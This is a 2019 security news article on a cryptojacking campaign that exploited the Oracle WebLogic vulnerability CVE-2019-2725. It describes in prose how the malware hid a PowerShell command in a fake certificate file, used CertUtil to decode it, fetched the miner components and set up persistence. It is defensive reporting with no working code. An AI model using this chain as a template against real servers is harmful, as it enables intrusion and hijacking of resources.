11 June 2019

Hackers weaponize critical Oracle WebLogic vulnerability in cryptojacking attacks

Hackers weaponize critical Oracle WebLogic vulnerability in cryptojacking attacks

Hackers abuse recently patched Oracle WebLogic Server vulnerability CVE-2019-2725 to deliver Monero miner on vulnerable machines. The bug is a deserialization issue, which allows unauthenticated remote command execution. The flaw was fixed by the vendor in late April, one week after proof-of-concept code for it was published online and cybercriminals started using it to install cryptocurrency miners.

In a new report Trend Micro’s researchers shed light on some of the activity involving CVE-2019-2725. The observed campaign has revealed an interesting twist - the malware hides its malicious codes in certificate files as an obfuscation tactic.

Once executed on the target machine the malware exploits CVE-2019-2725 to execute a command and perform a series of routines. First, PowerShell is used to download a certificate file from the command-and-control (C&C) server, which is saved in %APPDATA% under the name cert.cer. Then the legitimate CertUtil tool is used to decode the file, which is then executed using PowerShell. The downloaded file is then deleted using cmd.

The certificate file looks like a normal Privacy-Enhanced Mail (PEM) format certificate, but it actually comes in the form of the PowerShell command instead of the commonly used X.509 TLS file format.

“One interesting characteristic of the downloaded certificate file is that it requires that it be decoded twice before the PS command is revealed, which is unusual since the command from the exploit only uses CertUtil once,” said the report.

The PowerShell command in the certificate file downloads and executes another PowerShell script in memory, which in turn downloads and executes several files, including sysupdate.exe (Monero miner), config.json (configuration file for the miner), networkservice.exe (an executable possibly used for the propagation and exploitation of WebLogic), update.ps1 (the PowerShell script in memory), sysguard .exe (watchdog for the miner process), and clean.bat (deletes other components)

The update.ps1 file contains the decoded certificate file, which is replaced with the new update.ps1 and a scheduled task is created that will execute the new update.ps1 every 30 minutes.

The idea of using certificate files to hide malware is not a new one, but the attacks utilizing this technique have not been observed before. However, it appears that for the time being the hackers behind the above mentioned campaign are only testing this obfuscation method as other malicious files are downloaded without being hidden via the certificate file, pointed out the researchers.

Back to the list

Latest Posts

Hackers actively exploit a recently patched vulnerability in Exim email server software

Hackers actively exploit a recently patched vulnerability in Exim email server software

Millions of Exim email servers are currently under attack.
14 June 2019
FIN8 hacking group reappears with updated ShellTea backdoor, targets POS devices in the hotel industry

FIN8 hacking group reappears with updated ShellTea backdoor, targets POS devices in the hotel industry

FIN8 made several improvements to its malware arsenal, fixing bugs and making the malicious tools harder to detect.
13 June 2019
Hackers weaponize critical Oracle WebLogic vulnerability in cryptojacking attacks

Hackers weaponize critical Oracle WebLogic vulnerability in cryptojacking attacks

Trend Micro’s researchers shed light on some of the activity involving CVE-2019-2725.
11 June 2019
Featured vulnerabilities
Stored XSS in FortiWeb reports
Medium Patched | 13 Jun, 2019
Microsoft update for Adobe Flash (June 2019)
High Patched | 12 Jun, 2019